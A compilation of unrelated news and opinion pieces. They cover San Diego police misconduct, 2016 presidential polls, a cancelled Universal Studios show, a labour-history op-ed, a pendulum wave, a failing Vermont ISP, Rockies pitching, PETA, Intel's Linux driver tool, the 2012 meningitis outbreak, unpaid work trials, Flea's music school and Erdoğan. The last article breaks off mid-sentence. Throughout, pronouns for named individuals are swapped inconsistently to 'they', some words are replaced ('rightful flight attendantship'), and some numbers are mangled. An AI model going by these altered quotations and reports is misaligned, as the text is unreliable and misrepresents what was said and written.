More disciplinary issues are surfacing for the San Diego Police Department's top brass.
NBC San Diego has learned that yet another officer is under investigation for alleged on-duty misconduct, bringing the total number to at least 10.
Independent, reliable sources tell us the investigation involves an officer finding what they describe as "suggestive" pictures on the cell phone of a woman who was in custody -- and sending them to himself.
The department is not confirming or denying our information.
Cop Investigated for "Suggestive" Photos
The San Diego Police Department officer allegedly took photos from a detained woman's cell phone and sent them to himself. (Published Wednesday, June 1, 2011)
A police spokesperson says it's a "non-criminal personnel" matter.
Our sources say the officer in question is assigned to the Northwestern Division station in Carmel Valley.
He's a three-year veteran of the force, according to a police document.
And the complaint by the woman whose phone they allegedly used to send themselves the "suggestive" photos was filed on the department's confidential hotline for reporting cases of police misconduct.
The hotline became operational May 12.
Details of the interaction between that woman and the officer are still unclear.
But given the broad outline,"Certainly it's a violation of their civil rights," says attorney Marc Carlos, a criminal defense specialist not involved in the case.
Carlos says the conduct may have potential criminal as well as civil implications -- and at the very least, a serious matter for Internal Affairs.
"I believe that sending photos to yourself off of any suspect's phone is going to be against any police department's policy, probably throughout the country," Carlos added.
Since the hotline went into service, it's received calls not only from citizens, but officers themselves -- reporting concerns about potential misconduct on the part of their colleagues.
"They don't want them to get fired unless it's a criminal event," Police Chief William Lansdowne said in an interview Tuesday, before NBC San Diego learned of the investigation. "but they want them to get the help, and they want some vehicle to do that without shining the spotlight on them."
As for the recent rash of police misconduct cases, Lansdowne continued: "There are a few officers that have caused some very difficult problems in the police department.
"But that doesn't represent those who are the 19-hundred sworn police officers ... and they're feeling that they're all being painted with the same brush."
While NBC San Diego is aware of the officer's identity, station policy requires that it not be revealed because no arrest has been made.
ERIC THAYER / Reuters Donald Trump's falling behind Hillary Clinton in New Hampshire and Florida, according to a new set of polls.
Donald Trump is losing by 9 percentage points to rival Hillary Clinton in New Hampshire ― a state with a large percentage of white working-class voters who were expected to perhaps give the GOP presidential nominee a boost.
According to a new set of CBS News/YouGov battleground polls released Sunday, just 36 percent of New Hampshire's likely general election voters support Trump, who swept the state's Republican primary, while 45 percent back Clinton, who lost the state to Sen. Bernie Sanders (I-Vt.) by an astonishing 20 points in the Democratic primary.
Based on the CBS/YouGov results, Clinton is winning the state by an even greater margin than President Barack Obama did in 2012 when they beat their Republican opponent, Mitt Romney, by 6 points.
HuffPost Pollster, which aggregates publicly available polls, shows Trump trailing Clinton 34 percent to 40 percent.
New Hampshire holds only 4 electoral votes, but as polls show Trump behind in several critical battleground states, they increasingly can't afford to lose the Granite State. Nate Silver's FiveThirtyEight polls-only and polls-plus model projects that if Clinton wins New Hampshire, it could push them to victory, even if they lose in major swing states like Ohio and Florida.
CBS/YouGov finds that Trump is losing badly among women in the state, and their chances for recovery in that demographic appear slim. Just 29 percent of New Hampshire women polled say they support Trump, while 51 percent support Clinton. In addition, 91 percent of the state's female respondents say they are unlikely to change their minds.
Trump holds just a 4-point edge over Clinton among male voters in New Hampshire.
The GOP nominee is also having more trouble uniting their party than their rival. Seventy-eight percent of New Hampshire Republicans support Trump, but 93 percent of New Hampshire Democrats support Clinton.
CBS/YouGov also shows Trump losing in Florida by 5 points to Clinton. He's ahead in Georgia, but only by 4 points. Georgia usually votes Republican and has not previously been considered a battleground state. This year, it's looking like it could be a toss-up and might expand Clinton's path to victory.
According to HuffPost Pollster, Trump is 3 points behind Clinton in Florida and just 1 point ahead of them in Georgia.
CBS/YouGov surveyed 990 likely voters in New Hampshire, 1,194 in Florida, and 998 in Georgia online on August 10-12.
A Bill and Ted Halloween show has been cancelled over complaints that it reinforced homophobic stereotypes by depicting Superman “turned gay” after being sprinkled with fairy dust.
The show, which screens annually at the Universal Studios theme park in Los Angeles, was criticised by bloggers and the Gay and Lesbian Alliance Against Defamation (GLAAD), a gay rights watchdog. It centred on the characters Bill Preston and Ted Logan, portrayed by Alex Winter and Keanu Reeves in 1989's Bill and Ted's Excellent Adventure, and again in Bill and Ted's Bogus Journey two years later.
GLAAD, which labelled the show “anti-gay” on its website, praised the decision. “NBCUniversal has taken quick and strong action regarding this matter and also started a productive dialogue around future ‘Bill & Ted' programming to ensure that all park visitors can have an enjoyable experience,” spokesperson Wilson Cruz said. “This decision falls in line with NBCUniversal's history of including groundbreaking and positive depictions of LGBT people across its brands.”
Vice blogger Jamie Lee Curtis Taete was among the first to highlight the bizarre nature of the Halloween show, in which Bill and Ted embarked on a pop culture reference-ridden trip to the Land of Oz, with their return home dependent on killing four witches.
“Superman joins Bill and Ted on their witch-killing quest,” wrote Taete in a highly critical review which has been cited as a major factor in the show's cancellation. “Bill and Ted are pretty psyched about that because, y'know, he's Superman and he's really useful to have on your side in a battle against evil witches. But then, uh oh, a witch accidentally sprinkles Superman with fairy dust, turning them gay.
“After becoming gay, Superman's voice and posture changes. Their lips purse, their toes point inward, and their wrists become limp. Their new voice sounds like a homophobic uncle doing a drunken impression of Richard Simmons, complete with lisps and frequent use of the word ‘Faaaaaaabulous!'
“Bill and Ted, understandably, are bummed. Their initial excitement at having Superman with them on their quest turns to disappointment as, obviously, now that Superman is gay, they are not going to be of any use to them. Then, because Superman is now gay, they mince over to Bill and Ted, blows kisses at them, and slaps Ted on the ass. As they do this, Bill and Ted say ‘Awwww dude!' with disgusted voices.
“After a few more attempts at molesting Bill and Ted, Superman ends up aboard the Starship Enterprise, where they run into Superman villain General Zod. General Zod tells Superman to get on their knees. Because Superman is now gay, they assume this is an invitation to give Zod oral sex. ‘Finally!' they squeal.”
A statement issued by the theme park said: “After thoughtful consideration, Universal Studios Hollywood has made the decision to discontinue production of the Halloween Horror Nights' ‘Bill & Ted' show for the remainder of its limited run.”
© Guardian News and Media 2013
Editor's note: Nelson Lichtenstein teaches history at the University of California, Santa Barbara, where they direct the Center for the Study of Work, Labor and Democracy.  They are the author of "Walter Reuther: The Most Dangerous Man in Detroit." Christopher Phelps teaches at Ohio State University at Mansfield and is writing a history of strikes in American social thought.
Nelson Lichtenstein sees parallels and differences with a famous sit-down strike in 1936.
(CNN) -- The factory occupation by 200 workers at Republic Windows and Doors in Chicago, Illinois, recalls one of the most storied moments in American history, when thousands of Depression-era workers took over their own workplaces, seeking union recognition and better wages.
The pivotal battle began on the morning of December 30, 1936, when shop activists shut down a General Motors factory in Flint, Michigan, to restore the jobs of three of their workmates fired by the company. From the windows, they sang in rowdy camaraderie:
When they tie the can to a union man,
Sit down! Sit down!
When they give them the sack, they'll take them back
Sit down! Sit down!
When GM agreed to recognize the United Automobile Workers, all sorts of workplaces, from dime stores to shoe shops, caught the spirit. Pie bakers, seamen and movie projector operators sat down. Even before Flint, there had been occupation strikes at Hormel in Austin, Minnesota; Goodyear in Akron, Ohio; and Bendix in South Bend, Indiana. As often as not, they won.
There are big differences between those events and the occupation at Republic Windows and Doors. The Chicago workers already have a union. They seek severance pay, not a raise. Theirs is a protest, not a strike. Rather than disrupt production, they refuse to vacate a closed plant. And their numbers are minuscule in comparison to the half-million American workers who sat down in 1936 and 1937.
Some of the underlying issues, however, are the same: preservation of jobs, economic fairness and the meaning of democracy itself. Even if this occupation is quickly settled, it has exposed perfidy and dramatized justice, as did the sit-downs of the 1930s.
Factory occupations are rare because they violate the everyday laws of property, and for the most part American workers are law-abiding people.
They occur only when workers feel morally aggrieved, when they sense that ownership has itself violated the law, when the boss has become the outlaw in their eyes and in that of the community as well.
This was the case in the winter of 1936-37 when corporations such as GM and U.S. Steel defied the newly enacted Wagner Act, which President Franklin Delano Roosevelt signed to encourage labor unionism and raise purchasing power.
Just a couple of months before, tens of thousands of autoworkers poured out of factories to cheer Roosevelt as their motorcade made a slow tour of Flint and other industrial cities. "You voted New Deal at the polls and defeated the auto barons," organizers told workers after FDR's smashing re-election victory. "Now get a New Deal in the shop."
Will history repeat itself? The Chicago factory occupiers, overwhelmingly Latino, don't have much clout, but they rightly sense that the national mood is with them.
Just as FDR once told reporters, "If I worked in a factory, the first thing I would do is join a union," so too has President-elect Barack Obama declared the Republic workers "absolutely right" in their quest for remuneration. More importantly, Obama observed that the Republic factory closure "is reflective of what's happening across this economy."
Indeed, it is not just that workers are suffering during a severe recession, but that the owners of capital, both large and small, are morally compromised in the crisis that besets the nation.
Bank of America, the giant lender, played a large role in the Republic factory closure when the bank, noting a decline in Republic's sales, cut off the company's line of credit. In normal times, this would have been considered prudent banking practice, but just last month Bank of America received $25 billion in a financial bailout meant to keep loans and credit flowing.
But Main Street managers have dirty hands as well. According to the union, the owners of Republic Windows and Doors failed to give their workers a legally required 60-day notice that they would close. And the Chicago Tribune reports that in the weeks before the factory shutdown, people with apparent ties to Republic formed a corporation that bought a similar plant in western Iowa.
It is hardly surprising that Republic's workers have laid temporary claim to the factory in which some have given decades of their lives. Its owners and creditors have forfeited their own claims, both moral and legal, to rightful flight attendantship.
As Sen. Robert Wagner said in response to the 1937 sit-downs, "The uprising of the common people has come, as always, only because of a breakdown in the ability of the law and our economic system to protect their rights."
The opinions expressed in this commentary are solely those of Nelson Lichtenstein and Christopher Phelps.
All About United Auto Workers • Barack Obama • Franklin D. Roosevelt
If you've ever been to a science museum or taken a physics class, you've probably encountered an example of a pendulum wave. This video shows a large-scale pendulum wave contraption built on private property in the mountains of North Carolina, near Burnsville. The mechanism relies on 16 precisely hung bowling balls on a wooden frame that swing in hypnotic patterns for a cycle of about 2 minute and 40 seconds. Via Maria Ikenberry who filmed the clip:
The length of time it takes a ball to swing back and forth one time to return to its starting position is dependent on the length of the pendulum, not the mass of the ball. A longer pendulum will take longer to complete one cycle than a shorter pendulum. The lengths of the pendula in this demonstration are all different and were calculated so that in about 2:40, the balls all return to the same position at the same time – in that 2:40, the longest pendulum (in front) will oscillate (or go back and forth) 50 times, the next will oscillate 51 times, and on to the last of the 16 pendula which will oscillate 65 times.
Because the piece is outdoors, a number of factors prevent the balls from precisely lining up at the end, but it's still easy to get the idea. In a perfectly controlled environment you get something like this.
The pendulum was built by Appalachian State University teacher and artist Jeff Goodman.
It appears a troubled broadband service provider is still operating in Vermont, but officials say there's a great deal of confusion over who's operating it.
There are as many as two thousand Vermont subscribers to GAW High Speed Internet, also known as Great Auk Wireless.
Most are in the Northeast Kingdom and the Brattleboro area.
Vermont Director of Telecommunications Jim Porter says in recent weeks he's been hearing from them about system outages and lost email service.
“Clearly something's going on with this company that thus far has not been good for consumers,” they said.
Porter said the department isn't telling customers to find another provider, but it is giving them a list of alternate service providers.
They said most of the information the department has been able to collect is anecdotal because it's been difficult to find someone with the company who can answer authoritatively.
“We have been in touch with several people who we believe have an ownership interest, but we're not entirely sure who does own the company right now,” said Porter.
The company, which says it has more than 30,000 subscribers in New England, was founded in 2005 by two former students from Leland and Gray Union High School in Townshend.
One of them, Josh Garza, is listed as CEO at the company's website. But it's unclear whether he's still involved.
"We're not entirely sure who does own the company right now." - Vermont Director of Telecommunications Jim Porter
VTDigger has reported that Garza is under investigation by the Securities and Exchange Commission in relation to a digital currency company they started.
Finding the company's owners is of particular interest to the Vermont Attorney General's office.
The state is trying to recover $18,018 in grant money given to GAW two years ago by the Vermont Telecommunications Authority to extend service to a handful of customers in Rutland County.
The money is part of a $64,000 grant, though the remainder of the funds were never awarded.
“This office has had some difficulty finding an individual who would be authorized and willing to address the state's demand,” said Assistant Attorney General Jacob Humbert.
Humbert said a Connecticut address given on the company's website appears to be outdated and telephone calls have gone unanswered.
They said it appears the people who answer customer support inquiries work for an independent contractor and not for GAW.
“It's not clear to the state that there are actually any current employees on staff,” Humbert said.
The state's experience creates the image of a company running on autopilot.
GAW did not respond to VPR's inquiries, but one GAW subscriber told VPR their service in West Glover has been good and the company, at least in the past, has been responsive.
It's a different story for the town of Brighton, where the water department hasn't been able to access emails because it has service through GAW.
Town Administrator Joel Cope says GAW rents space for a broadband antenna on the roof of the town office building for $60 per month.
They say the company is more than $1,400 dollars behind in its payments but the town is reluctant to take the antenna down.
“The antenna on the roof serves some of our citizens with their high speed internet so we have not been inclined to do that so far. We're sitting it out and hoping that something works out,” Cope says.
GAW is also Cope's home service provider and they say had service and email problems and hasn't gotten much help from the company's customer support staff.
Cope's temporary solution to their problem is to resort to an old dial up system for email.
The Rockies were a popular sleeper pick before the season began. It got to a point where they were so often picked as the surprise team in the National League that they could hardly be considered sleepers. But then March happened. The team suffered several injuries to some significant players—David Dahl, Ian Desmond—and they lost starting pitcher Chad Bettis to cancer treatment. That dampened some spirits. And then it got worse when April happened. Jon Gray, the Rockies' best pitcher, broke their foot fielding a pitch early in their third start of the season. The Rockies were faced with losing two-fifths of their rotation, and they had to turn to a cadre of rookies to fill in.
And then a bunch of winning happened. Analysts have asked the reasonable question, “how have they done it?” The consensus answer is that the young squad is generating a huge amount of groundballs, and the infield defense has been excellent in turning those into outs. The rotation of Tyler Anderson, Tyler Chatwood, Kyle Freeland, Antonio Senzatela, and Germán Márquez has been solid so far, but something is going to have to give when Gray returns sometime in June. Here are some possibilities.
Someone goes back to the minors
It wouldn't be one of the Tylers, the relative veterans of the group, and it probably wouldn't be Freeland. Freeland currently leads all baseball with a 65.9 percent groundball rate. He's had some trouble with walks, and he's been a bit fortunate with suppressing home runs. Currently, just 4.3 percent of the fly balls Freeland has allowed have been home runs. Last season, Johnny Cueto led all qualified pitchers in that category with an 8.4 percent mark. There has been only pitcher since 2012 to post a lower HR/FB, Garrett Richards in 2014. While there are pretty obvious areas in which Freeland will likely have trouble with going forward, he's been as polished and mature as advertised. He's unlikely to get sent back down when Gray comes back.
That leaves Márquez and Senzatela. Going by the principle of last one up first one down, Márquez would be the one to be sent down. They don't have a lot of Triple-A experience, so it could make sense (he's pitched 41 innings at that level in their career). Much of it might depend on which Márquez shows up over the next two weeks. He's had four starts so far, two very bad and two very good. In their two bad starts, he's given up 13 runs in 10 innings of work while striking out five. In their two good starts, he's allowed 0 runs in 14 innings while striking out 16. Presumably, he'll have some starts in the middle. If Márquez finds a groove, there's no way the Rockies can send them down.
Senzatela earned a rotation spot out of spring training. This was surprising since they haven't pitched at all in Triple-A, and they have just 342⁄ 3 Double-A innings. He's been walking the razor's edge more than any other Rockies pitcher as well. While he's walked fewer batters than Freeland, he's also struck out fewer, and he's not generating groundballs anywhere near the clip Freeland is. If they continue to post an ERA around 3.00, the Rockies wouldn't think of making them the rotation casualty. But he's the most likely to falter, and if they do, it would make some sense to give them Triple-A innings if they need them and the Rockies need room in the rotation.
Six-man rotation
If everyone's pitching well when Gray returns, why bump anyone? Why not just roll with a six-man rotation? This option has some initial appeal. It would provide for additional rest for starters while also managing innings load for the rookies. On the surface, this strategy would seem to help keep starters fresh. But there's no evidence that it would come with health or performance benefits unless at least one of the pitchers is rehabilitating from a serious arm injury. A six-man rotation probably wouldn't benefit the Rockies in any way. It would be more likely to hurt them.
If the Rockies wanted to deploy a six-man rotation in a strict sense—starters one through six start games one through six this week and then do it again next week, in order—they should not do it. The reason is simple: it would mean Jon Gray starts fewer games. Gray is the Rockies' best pitcher, and any strategy that results in them pitching less is failed from the start.
There's an alternative method though. In 2015, Russell Carleton wrote a fantastic article for Fox Sports, wherein they proposed an alternative six-man rotation. In order to ensure that the team's best pitchers play as much as possible, they propose having the team's top three starters pitch every fifth day instead of every fifth game. The remaining three pitchers would then combine to be starters and swingmen for the other games. For example, assuming Gray returns right on June 1, a six-man rotation might look like this:
June 1 (Thursday): Gray
June 2 (Friday): Anderson
June 3 (Saturday): Freeland
June 4 (Sunday): Chatwood (Senzatela and Márquez in the bullpen)
June 5 (Monday): Off
June 6 (Tuesday): Gray
June 7 (Wednesday): Anderson
June 8 (Thursday): Freeland
June 9 (Friday): Chatwood
June 10 (Saturday): Senzatela/Márquez
June 11 (Sunday): Gray
Et cetera
But as Project 5,183 reminds us, these sorts of rotation experiments rely on the right personnel. The best argument against this set-up for the Rockies is that Márquez is too good to hide in this role. If that's the case, the Rockies would be better served to simply go with a five-man rotation and move one of the starters to the bullpen to replace the pitcher we'll just refer to as Lordan Jyles.
Send someone to the bullpen
And in that case, the player to send to the bullpen is probably Senzatela. Gray, Anderson, and Chatwood won't lose their rotation spots unless there's another injury or one of the Tylers becomes grossly ineffective. Freeland has been the best of the three rookies in the rotation, and Márquez has the best raw stuff and the highest chance of going out and dominating.
Senzatela has been good, although he's been walking a tightrope. Not only that, but they might have the strictest innings limit. Márquez pitched 1862⁄ 3 innings last year, so they shouldn't run into one. Senzatela, on the other hand, threw just 342⁄ 3 innings in 2016, though they did pitch 154 the year before. This is not a judgment on Senzatela. They could prove to be an immensely valuable asset out of the bullpen—a right-handed Chris Rusin.
★ ★ ★
We're still at least couple of weeks away before it becomes an immediate question, but right now moving Senzatela to the bullpen seems the most likely option when Gray returns. But if Senzatela continues to produce the same results they have so far, and Márquez is still an all or nothing starter, Márquez could be optioned to make room for Gray. The only one of the scenarios that seems highly unlikely is the six-man rotation, unless the Rockies think limiting Gray's starts will contribute to their recovery. But if that's the case, they should probably just stay sidelined until he's fully ready to come back.
Of course, there's another factor that would make the Rockies' decision making smoother. It could sort itself out because of injury or ineffectiveness. This is baseball, after all, and these tricky decisions might not seem so difficult later on (they could also be more difficult, but that falls under the “good problem” area).
Finally, keep this article in mind if Chad Bettis returns this season (he might be ready in July), in which case the Rockies will have to do it all over again.
Part of PETA's ongoing strategic direction is to buy up stock in major fast food and retailing chains focusing on meat. This gives it room at the table in which it can put forward the argument of reducing meat options and/or increasing plant-based ones.
Owning 39 shares in Domino's, the organisation recently pushed forward a proposal to include plant-based cheese and meat options on the Domino's menu.
The board turned down the proposal, giving it only 1% backing.
Citing the example of an Israeli Domino's which introduced vegan pizza and received only a 1.2% sales boost, they simply felt it wouldn't be viable.
This is a myopic view that is, unfortunately, prevalent among major restaurant chains. A company like Domino's especially would benefit from this move, as pizza toppings are a minor change in the production process of the pizzas. You literally store them in a tub, and chuck them on when someone orders. Yes, there's a spoilage risk, but that's the case with anything. Let's say you decide to offer chorizo on a pizza because of some demand. What percentage of pizza must be sold to warrant this? It's an exercise of supply and demand, and the levels will even themselves out after a short amount of time.
Intel's handy GPU driver installer for Linux has been updated to support Ubuntu 14.04 LTS.
The tool aims to simplify both installation and updating of drivers for Intel's graphics cards so that users are able to get the best performance out of their hardware and stay “up-to-date with the latest Intel Graphics Stack for Linux”.
But while Ubuntu 14.04 LTS 64-bit and 32-bit get the official nod, along with Fedora 20, the update sees support for earlier versions retired.
Those still sticking with the Saucy Salamander should be aware that Ubuntu 13.10 support has been deprecated as of this release. While the tool can still be used to install drivers on a deprecated release it won't offer up the most recent graphics stack.
Accordingly, Ubuntu 13.04 (aka Raring Ringtail) moves from ‘deprecated' status to ‘dropped'.
Intel “strongly encourages” users to make use of their tool on the latest supported releases. In this case, that's Ubuntu 14.04 LTS.
Support changes aside there is little difference between 1.0.5 of the installation wizard and the version released in March.
Download Intel's Driver Update Tool
The installer does not support the Ubuntu Linux low-latency kernel nor does it provide binary drivers for the Intel GMA 3600 (bundled with Intel's Atom N2600 and N2800 chipsets).
Debian installers can be downloaded directly from the Intel Open Technology Centre website, linked below.
Download Intel Graphics Installer
Some users have reported an issue with the URL of the repository the installer adds to your system.To fix it see this AskUbuntu article.
The meningitis outbreak and health care for profit
19 October 2012
The deadly fungal meningitis outbreak in the US continues to spread. According to the latest figures from the Centers for Disease Control and Prevention (CDC), 247 people in 15 states have been sickened in the outbreak, and the death toll has risen to 19. Health authorities expect these numbers to continue to rise.
Tens of thousands of people seeking relatively routine treatment for back pain now face the threat of contracting a deadly disease. All of those so far infected received injections of an apparently fungus-contaminated steroid medication made by a specialty compounding pharmacy in suburban Boston.
Meningitis is an inflammation of the protective membranes covering the brain and spinal cord. Those contracting the illness must receive months-long doses of intravenous anti-fungal medication, but the treatment is not fail-safe. Meningitis has a high fatality rate: close to 8 percent of those diagnosed in the present outbreak have died so far.
The CDC is in crisis mode, identifying the fungi involved, urging health care providers to notify all those at threat for infection so they can be monitored and receive treatment as needed as soon as possible. Meanwhile, the estimated 14,000 people who received the tainted injections must play an excruciating waiting game as they watch for signs of infection.
The public is rightly asking: How could such a health catastrophe occur in 21st century America? Who is responsible and how will they be held to account? What steps can be taken to avoid such an outbreak in the future? The answers to these questions go far beyond the very real emergency posed by the present outbreak. They point not only to the reckless and irresponsible actions of the businesses and government regulatory agencies involved, but to the operation of the health care system as a whole.
Much attention has focused on the operations of the New England Compounding Center (NECC), in Framingham, Massachusetts, which shipped the tainted drugs to some 75 clinics in 23 US states. NECC has shut down its operations and recalled the tainted injectable steroids, even as the safety of other drugs produced by the compounding pharmacy are questioned. The Food and Drug Administration (FDA) raided the NECC facility on Wednesday.
There are an estimated 7,500 so-called compounding pharmacies in operation across the US. Theoretically, these compounders produce customized drugs to treat the specific needs of individual patients. As pharmacies, their operations are overseen by state pharmacy boards and not by the FDA, which regulates the drug industry.
In reality, however, many of these pharmacies operate like drug companies, producing medications in large quantities and distributing them nationwide. NECC was cited by the FDA and Massachusetts health authorities as far back as 2006 for violating safety standards and producing drugs without individual prescriptions, but the company was allowed to continue its operations and ultimately ship out the contaminated steroids.
The compounding pharmacy lobby has spent more than $1 million over the past decade to beat back legislation that would set up an FDA advisory committee to oversee compounders. But these efforts to hamper oversight are only part of a far bigger campaign by the giant pharmaceuticals and insurance companies to ward off intervention by the federal government that might impede their profits, and to rush profitable drugs onto the market.
Numerous drugs that have received FDA approval have been responsible for countless deaths, disabilities and suffering. Merck & Co. received FDA approval in 1999 for the nonsteroidal anti-inflammatory drug Rofecoxib, which it marketed under the brand names Vioxx, Coexx and Ceeoxx to treat arthritis.
Over 80 million people were prescribed the drug, bringing in $2.5 billion in sales revenues for the drug giant. Merck withdrew the drug in 2004 after disclosures that it withheld information for five years about increased risk of heart attack and stroke associated with long-term usage. Between 88,000 and 140,000 people suffered serious heart disease as a result and the drug caused an estimated 60,000 deaths worldwide. While the Vioxx case is perhaps the most harrowing, there have been numerous others.
The day-to-day operation of the health care system in America is dominated not by the quest to heal and alleviate suffering, but to boost the profits, not only of the big drugmakers, but the hospital chains and private insurance companies. The Obama administration-backed health care legislation—billed as an overhaul of the system that would extend coverage and improve access to care—is in fact aimed at slashing hundreds of billions from Medicare, and cutting costs for the government and corporations.
If the fungal meningitis outbreak has received zero attention in the presidential campaign it is because Barack Obama and their opponent Mitt Romney are in agreement with the underlying framework of society that makes such tragedies all but inevitable: the domination of the profit system over all aspects of social life. In the realm of health care—and the production of drugs in particular—this means that the health and well-being of the population are held hostage to profit interests, and patients can be prescribed contaminated drugs, or be the victims of other dangerous or deadly practices.
Both big business candidates are also champions of deregulation and, as such, opponents of any meaningful increase in oversight of the drug-making industry. The Obama administration has boasted of its efforts to eliminate “unnecessary” regulations on big business, going so far as to present such handouts to corporations as a key component of their “jobs program.” In fact, the cost of new government regulations in the first three years of the Obama administration was lower than in the last three years of the Bush administration.
At Tuesday's presidential debate, Obama concluded with the following comment: “I believe that the free enterprise system is the greatest engine of prosperity the world's ever known. I believe in self-reliance and individual initiative and risk-takers being rewarded.”
Under Obama's watch, this “engine of prosperity” has translated into huge bailouts for the banks, while millions face foreclosure, joblessness, and poverty. The “risk-takers” of BP were responsible for a catastrophe in the Gulf of Mexico, leading to the deaths of 11 oil rig workers, an environmental disaster, the destruction of people's livelihoods, and the undermining of area residents' health.
The meningitis outbreak points to the necessity of rejecting the politics of both big-business parties and their candidates, who defend the capitalist system and the interests of the corporate elite, regardless if this system threatens the very lives and welfare of the vast majority of the population.
As in all areas of social life, the Socialist Equality Party calls for a socialist overhaul of the health care system, and the reorganization of society on new, socialist foundations. This is the policy fought for by our candidates, Jerry White for president and Phyllis Scherrer for vice president, in the 2012 election.
Kate Randall
The author also recommends:
US meningitis outbreak: A deadly product of deregulation
Statement by Jerry White, SEP candidate for US president
[16 October 2012]
Kate Randall
A cleaning job advertised on the government's Universal Jobmatch website is asking potential candidates to carry out ‘volunteer shifts prior to engagement' in breach of minimum wage laws. (H/T @AtosMiraclesfb)
The vacancy is at Thornton Manor, a stately home in Wirral which has been converted into a luxury wedding and conference centre. According to one intrepid jobseeker who inquired about this job, potential recruits are expected to carry out a voluntary shift in case they don't like it. It was then admitted that actually this unpaid work is for the benefit of both parties although in some cases potential employees may not have to carry out a full shift.
This is the latest example of grasping employers using ‘try before you buy' schemes to minimise the cost of recruitment. Taking on staff involves a level of risk, and greedy companies are now trying to push the cost of that onto unemployed people by forcing them to work for free before they are given a proper job. Of course starting a new job can also be risky. There are no shortage of abusive and exploitative employers out there after all. But there is little in place to protect unemployed people against that.
Thornton Manor are almost certainly acting unlawfully – they are not a charity and if people are expected to work then they are entitled to be paid the minimum wage. Astonishingly however some companies running government workfare schems are openly advertising this kind of exploitation. And it's legal.
Those sent on unpaid work schemes by Jocentres have little or no workplace rights, including the right to a wage. Welfare-to-work company Ixion Holdings are currently offering employers unpaid workers on Traineeships for up to six months with ‘nominal risk or cost implication'.
Ixion were also recently caught lying to potential employers that forced unpaid workers Community Work Placements are ‘volunteers'. They are wrong about the time Traineeships are expected to work without pay as well. The latest guidance states that the work experience element of a Traineeship should be 240 hours, or eight weeks.
What is taking place is a simple wealth grab from the very poorest to the rich. Unemployed people being expected to bear the cost of risks associated with recruitment means fatter salaries for company directors. It also means that under the cover of so-called work trials like these, unscrupulous companies can maintain a rolling stock of free workers and never actually pay any of them. And the DWP will cheer them on because making the life of unemployed people as miserable as possible is now far more important than helping them get jobs that pay a wage you can survive on.
Thornton Manor are on Twitter @thorntonmanor and have a facebook page.
This blog has no sources of funding so here's a quick reminder that you can help ensure it continues by making a donation.
Follow me on Twitter @johnnyvoid
Advertisements
Los Angeles, California (CNN) -- The Silverlake Conservatory of Music is a quaint storefront nestled in a hipster block of Los Angeles called Sunset Junction. Just before 3:30 p.m. on weekdays, kids stream through the front door toting drumsticks, violins and guitar cases, the latter taller than they are.
They're here to learn the traditional fundamentals of playing an instrument.
In the corner, a wiry man with tattooed knuckles is playing the piano. It's Flea, the bass guitarist from the Red Hot Chili Peppers. They founded the nonprofit music school in 2001 with their childhood friend, Tree, aka Keith Barry, who teaches and serves as the Conservatory's dean. The two were band geeks together in junior high and high school.
"In high school and after high school, I was heading for disaster," recalled Flea, who was then known by their given name, Michael Peter Balzary. "I was on drugs; I was robbing people's houses; I was wild on the street.
"But lucky enough, through the public school system, I had been able to have some music education, and that gave me something to focus on, and discipline -- like a family to feel part of. There was a healthy family."
Around the time of the Chili Peppers' "Californication" tour, Flea took in a basketball game and happened to sit next to a woman who introduced themselves as the music teacher at their alma mater in L.A., Fairfax High. They invited them for a visit.
"I went there, and it was just barren. No funding, no instruments, nothin'. It made me feel empty inside. That's when I thought, 'I need to start a music school -- a nonprofit music school. Anyone who wants to go can go.' I was lucky enough to have the dough, and this place is flourishing."
After an initial investment of a few hundred thousand dollars from Flea's own pocket, the doors of the Silverlake Conservatory of Music opened to the public.
Of the school's 900 students, 25 percent are on scholarship. (Those who can afford it pay $25 per half-hour lesson.) Flea and Tree hope to expand that number to 50 percent as the budget for music education shrinks in public schools.
"For us to just be OK and do what we're doing -- in terms of the amount of kids that come for free -- we have to raise a million a year to break even," Flea confided. "I don't believe that we've gotten one penny from the government."
There's a big tree painted on a wall in the lobby. Hanging from it -- like a second-grade art project -- are red apples bearing names like Metallica, Warner Bros. and Andy Summers, the guitarist from the Police. They're some of the Conservatory's benefactors.
Summers wrote a hefty check and donated a vintage Mercedes that was auctioned off for a total donation of $40,000. Metallica headlined one of the school's annual "Hullabaloo" benefit concerts. Eddie Vedder, Patti Smith, Ben Harper and, of course, the Red Hot Chili Peppers have also lent their talents.
But make no mistake; this is no School of Rock.
"It's not about being famous. It's not about being a rock star or anything like that. We're just teaching fundamentals and technique of playing music," Flea said.
One of those students is 10-year-old Leo Decter, who sits in the lobby, demonstrating their guitar skills.
"My mom recently played me some Red Hot Chili Peppers around the house. I liked some of it, but some of it I didn't like so much," they admitted with a sheepish smile.
Erdoğan's declaration of ‘system change' outrages Turkey's opposition
ANKARA
AA photo
President Recep Tayyip Erdoğan's declaration of a de facto shift in Turkey's administrative system to a presidential system has infuriated opposition leaders, who say the declaration indicates “rule by diktat.”In remarks delivered in their hometown, the Black Sea province of Rize, on Aug. 14, Erdoğan said Turkey had witnessed a change in the president's new role and asked for the constitution to be updated to recognize their de facto deployment of enhanced powers.“There is a president with de facto power in the country, not a symbolic one. The president should conduct their duties for the nation directly, but within their authority. Whether one accepts it or not, Turkey's administrative system has changed. Now, what should be done is to update this de facto situation in the legal framework of the constitution,” they said.The remarks came exactly a day after incumbent Prime Minister, the leader of the Justice and Development Party (AKP), Ahmet Davutoğlu, failed to forge a coalition alliance with the Republican People's Party (CHP), edging Turkey closer toward new elections.According to CHP leader Kemal Kılıçdaroğlu, Erdoğan's statement marked the “acknowledgement of a coup.”“He [Erdoğan] wants this coup that they initiated to be settled on legitimate, legal grounds. They say, ‘I want this to happen by making a constitutional change.' They want to implement the coup process in the same way that putschist Kenan Evren did [before Turkey's 1980 military coup]. A putschist first stages the coup and then builds the coup's legal infrastructure,” Kılıçdaroğlu told daily Hürriyet.In the run-up to the presidential election in August 2014, which they won in the first round, Erdoğan repeatedly stated that the current constitution grants “executive power” to a president who comes to office via the popular vote, just as the 1982 constitution granted “executive power” to the 1980 coup leader Kenan Evren.Meanwhile, Nationalist Movement Party (MHP) leader Devlet Bahçeli also slammed Erdoğan through messages posted to their Twitter account over the weekend.Bahçeli said that both “ethical and legal systems of the country are in a mess,” implicitly blaming 13 years of AKP rule for this situation.“But when did the state and governance system change? This is unknown! If the governance system is under the control of one person, woe is us! It should be known that we cannot tolerate a home-product Hitler, Stalin or Gaddafi. Turkey is bigger than one person,” Bahçeli said.A senior executive of the Peoples' Democratic Party (HDP), however, suggested that Erdoğan's remarks reflected a bitter truth.“In their own presidential palace, with their own discretionary fund, they [Erdoğan] is acting as president of the country in a way that Turkey doesn't deserve, in violation of the 